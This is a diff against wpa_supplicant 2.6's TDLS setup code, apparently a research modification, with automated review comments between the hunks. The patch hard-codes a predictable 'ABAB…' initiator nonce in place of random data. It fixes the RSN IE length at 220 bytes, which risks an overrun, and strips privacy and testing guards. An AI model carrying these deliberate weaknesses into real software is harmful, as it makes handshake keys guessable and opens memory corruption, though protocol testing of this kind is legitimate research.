--- wpa_supplicant-2.6/src/rsn_supp/tdls.c 2016-10-02 19:51:11.000000000 +0100
|
+++ TDLSSetupModification/wpa_supplicant-2.6/src/rsn_supp/tdls.c 2016-12-19 13:15:54.000000000 +0000
|
@@ -1152,13 +1152,12 @@
|
ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION;
|
ftie->ie_len = sizeof(struct wpa_tdls_ftie) - 2;
|
|
- if (os_get_random(peer->inonce, WPA_NONCE_LEN)) {
|
- wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
|
- "TDLS: Failed to get random data for initiator Nonce");
|
- os_free(rbuf);
|
- wpa_tdls_peer_free(sm, peer);
|
- return -1;
|
- }
|
+ //PATCH
|
+ //Using a fabricated nonce! This should later get included in the FTIE
|
+ int i=0;
|
+ for (i=0; i<WPA_NONCE_LEN; i++)
|
+ ((u8*)peer->inonce)[i] = (i % 2 == 0) ? 'A' : 'B';
|
+
|
wpa_hexdump(MSG_DEBUG, "TDLS: Initiator Nonce for TPK handshake",
|
peer->inonce, WPA_NONCE_LEN);
|
os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
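Review bot: The constant alternating 'A'/'B' initiator nonce is compiled unconditionally, replacing the os_get_random() call for every build that carries this patch, so the nonce the TPK is derived from is fully predictable; keep the os_get_random() branch as the default and put the fabricated nonce behind the test build flag this file already uses, `#ifdef CONFIG_TDLS_TESTING`. The loop also declares `int i=0;` after statements, whereas the rest of this file keeps declarations at the top of the block; declaring `i` alongside the other locals would match. The `(u8*)` cast on `peer->inonce` is presumably redundant if inonce is already a u8 array — worth confirming against the peer struct. The enclosing function starts and ends outside the hunk.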
|
@@ -1325,59 +1324,37 @@
|
u32 lifetime;
|
int status;
|
u32 peer_capab = 0;
|
+ int rsnie_length = 220;
|
|
buf_len = 0;
|
- if (wpa_tdls_get_privacy(sm)) {
|
- /* Peer RSN IE, FTIE(Initiator Nonce, Responder Nonce),
|
- * Lifetime */
|
- buf_len += peer->rsnie_i_len + sizeof(struct wpa_tdls_ftie) +
|
- sizeof(struct wpa_tdls_timeoutie);
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_LONG_FRAME)
|
- buf_len += 170;
|
-#endif /* CONFIG_TDLS_TESTING */
|
- }
|
+ buf_len = rsnie_length + 2 + sizeof(struct wpa_tdls_ftie) + sizeof(struct wpa_tdls_timeoutie) + sizeof(struct wpa_tdls_lnkid);
|
|
rbuf = os_zalloc(buf_len + 1);
|
if (rbuf == NULL)
|
return -1;
|
pos = rbuf;
|
|
- if (!wpa_tdls_get_privacy(sm))
|
- goto skip_ies;
|
-
|
/* Peer RSN IE */
|
- pos = wpa_add_ie(pos, peer->rsnie_p, peer->rsnie_p_len);
|
-
|
+ wpa_add_ie(pos, peer->rsnie_p, peer->rsnie_p_len);
|
+ u8* rsn = pos;
|
+ pos[1] = rsnie_length;
|
+ pos += pos[1] + 2; //skipping the RSN IE
|
+ //Adding the FTIE
|
ftie = (struct wpa_tdls_ftie *) pos;
|
ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION;
|
/*TODO: ftie->mic_control to set 3-CONFIRM */
|
os_memcpy(ftie->Anonce, peer->rnonce, WPA_NONCE_LEN);
|
os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
|
ftie->ie_len = sizeof(struct wpa_tdls_ftie) - 2;
|
-
|
pos = (u8 *) (ftie + 1);
|
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_LONG_FRAME) {
|
- wpa_printf(MSG_DEBUG, "TDLS: Testing - add extra subelem to "
|
- "FTIE");
|
- ftie->ie_len += 170;
|
- *pos++ = 255; /* FTIE subelem */
|
- *pos++ = 168; /* FTIE subelem length */
|
- pos += 168;
|
- }
|
-#endif /* CONFIG_TDLS_TESTING */
|
+ //Manually adding a linkid IE
|
+ struct wpa_tdls_lnkid *l = (struct wpa_tdls_lnkid *) pos;
|
+ wpa_tdls_linkid(sm, (struct wpa_tdls_peer*)peer, l);
|
+ pos += sizeof(*l);
|
|
/* Lifetime */
|
lifetime = peer->lifetime;
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_WRONG_LIFETIME_CONF) {
|
- wpa_printf(MSG_DEBUG, "TDLS: Testing - use wrong TPK "
|
- "lifetime in confirm");
|
- lifetime++;
|
- }
|
-#endif /* CONFIG_TDLS_TESTING */
|
pos = wpa_add_tdls_timeoutie(pos, (u8 *) &timeoutie,
|
sizeof(timeoutie), lifetime);
|
wpa_printf(MSG_DEBUG, "TDLS: TPK lifetime %u seconds",
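Review bot: `wpa_add_ie(pos, peer->rsnie_p, peer->rsnie_p_len)` still copies the whole stored RSN IE, but rbuf is now sized from the fixed `rsnie_length` of 220 rather than from `peer->rsnie_p_len`, so if the stored IE can ever exceed 222 bytes the copy overruns the allocation; either size `buf_len` from the larger of the two or reject early with `if (peer->rsnie_p_len > (size_t) rsnie_length + 2) { os_free(rbuf); return -1; }` before the copy (if rsnie_p is a bounded array smaller than that, a comment recording the invariant makes the fixed size safe by construction). The local `u8* rsn = pos;` is never read within the hunk and can go; it is also a declaration after statements, which the rest of the file avoids. The MIC computed further down is taken over `peer->rsnie_p` and the `lnkid` argument, not over the RSN IE whose length byte is rewritten at `pos[1] = rsnie_length;` nor the extra link-ID IE written at `l`; if that divergence is the intent of the modification, a one-line comment above `pos[1] = rsnie_length;` saying so would stop the next reader from treating it as a bug. The enclosing function starts before the hunk.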
|
@@ -1386,14 +1363,6 @@
|
/* compute MIC before sending */
|
wpa_tdls_ftie_mic(peer->tpk.kck, 3, (u8 *) lnkid, peer->rsnie_p,
|
(u8 *) &timeoutie, (u8 *) ftie, ftie->mic);
|
-#ifdef CONFIG_TDLS_TESTING
|
- if (tdls_testing & TDLS_TESTING_WRONG_MIC) {
|
- wpa_printf(MSG_DEBUG, "TDLS: Testing - use wrong MIC");
|
- ftie->mic[0] ^= 0x01;
|
- }
|
-#endif /* CONFIG_TDLS_TESTING */
|
-
|
-skip_ies:
|
|
if (peer->vht_capabilities)
|
peer_capab |= TDLS_PEER_VHT;
|